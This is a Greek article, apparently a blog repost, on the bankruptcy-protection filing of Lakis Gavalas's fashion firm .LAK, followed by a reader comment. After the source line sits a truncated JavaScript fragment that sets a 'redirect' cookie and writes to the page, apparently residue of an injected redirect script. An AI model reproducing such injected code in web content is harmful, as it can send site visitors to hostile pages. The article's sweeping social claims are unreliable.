Λάκης Γαβαλάς: η άνοδος και η πτώση ενός μύθου

Γνωρίζατε ότι η Burberry και η D&G παραδίδουν τα εμπορεύματα απευθείας στους πελάτες επειδή ο αντιπρόσωπός τους στην Ελλάδα έχει υπαχθεί στο άρθρο 99; Και όμως η εταιρία .LAK του γνωστού μας Λάκη Γαβαλά αδυνατεί να πληρώσει τα χρωστούμενα και να εξοφλήσει τους πιστωτές τους και έτσι έχει καταφύγει στο άρθρο 99.

Ας τα πάρουμε όμως από την αρχή. …

Η εταιρεία εκτός από τις εισαγωγές που έκανε γνωστών εταιριών όπως η Burberry και η D&G, έβγαζε τη δική της σειρά. Το λογότυπο .LAK, μάλιστα, έφερνε στην επιχείρηση κέρδη που συναγωνίζονταν επάξια τα κέρδη των μεγάλων οίκων που εισήγαγε. Δεν υπήρχε αμφιβολία,ο Λάκης Γαβαλάς ήταν ο (μαυρισμένος) βασιλιάς της ελληνικής μόδας.

Το παλάτι του χτίστηκε στην Κάντζα – σχεδιαστήριο, showroom, αποθήκες και γραφεία, μια αυτοκρατορία μόδας, που υπονοούσε ότι η επέκταση στο εξωτερικό δεν αργούσε – και ήταν ένα κτήριο-ωδή στο design, μοντέρνο και μίνιμαλ, συμβατό με την αισθητική του ιδιοκτήτη, που αγαπούσε το ωραίο, την dolce vita και τα πάρτυ στη Μύκονο, ως οικοδεσπότης δε, όπως διαβάζαμε, ήταν από τους καλύτερους. Η κυριαρχία που εδραιώθηκε στα καλοζωισμένα και αλαζονικά 90s, όμως άρχισε να κλονίζεται και, 5 μόλις χρόνια μετά τη μετακόμιση, οι κτηριακές εγκαταστάσεις βρέθηκαν να πωλούνται, λίγο μετά την έφοδο του Υπουργείου Οικονομικών στην εταιρεία που κατέληξε σε πρόστιμο 5 εκ. ευρώ για αμέλεια πληρωμής Φ.Π.Α.

Και μετά, ήρθε η είδηση περί υπαγωγής στο Άρθρο 99 και πέρα από την καθαρά οικονομική πλευρά, που θα συζητηθεί στο δικαστήριο, και τις 60 περίπου εταιρείες που εκπροσωπούσε στην Ελλάδα και που τώρα αναγκάστηκαν να κάνουν τα κουμάντα τους (ήδη η Burberry και η D&G παραδίδουν τα εμπορεύματα απευθείας στους πελάτες), υπάρχει και η σημειολογία του lifestyle. Ναι μεν το ρούχο γενικά δέχεται τεράστιο πλήγμα αφού ο κλάδος του λιανεμπορίου και συγκεκριμένα της ένδυσης καταγράφει πτώση τζίρου της τάξεως άνω του 50%, σύμφωνα με το Reporter.gr, όμως εξίσου σημαντικό είναι το γόητρο. Η πτώχευση τέτοιου είδους εταιρειών, όπως και το κλείσιμο περιοδικών μεγάλων ομίλων, είναι το σύνθημα ότι μια εποχή ίσως τελειώνει – και είναι αυτή των αμόρφωτων κοριτσιών που περπατούσαν σε πασαρέλες και πόζαραν προκλητικά για φωτογραφίσεις με κόκκο με απώτερο στόχο τον γάμο με τον πλούσιο τσαμπουκά επιχειρηματία, στόχο που 8 στις 10 πετύχαιναν. Είναι αυτή των γόνων, που κατέλυαν στα πρώτα τραπέζια της παραλιακής κάνοντας την επίδειξη πλούτου όνειρο των παιδιών των λαϊκών συνοικιών. Είναι, τέλος, αυτή των ανθρώπων που πάρταραν ξέγνοιαστα, και που ίσως από δω και μπρος το βρουν κάπως πιο δύσκολο, όπως και η βάση της κοινωνικής πυραμίδας, να συνεχίσουν να παρτάρουν.

 

πηγή: iefmerida.gr
ate=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

2 Responses

  1. DIVRIOTOU HAROULA says:

    CAN YOU TELL HOW CAN I GET CONTACT WITH COMPANIES DG AND BURBERRY. I HAVE A SHOP AND I WOULD LIKE TO HAVE THESE BRANDS IN BUT I NEED THE INFO…

Leave a Reply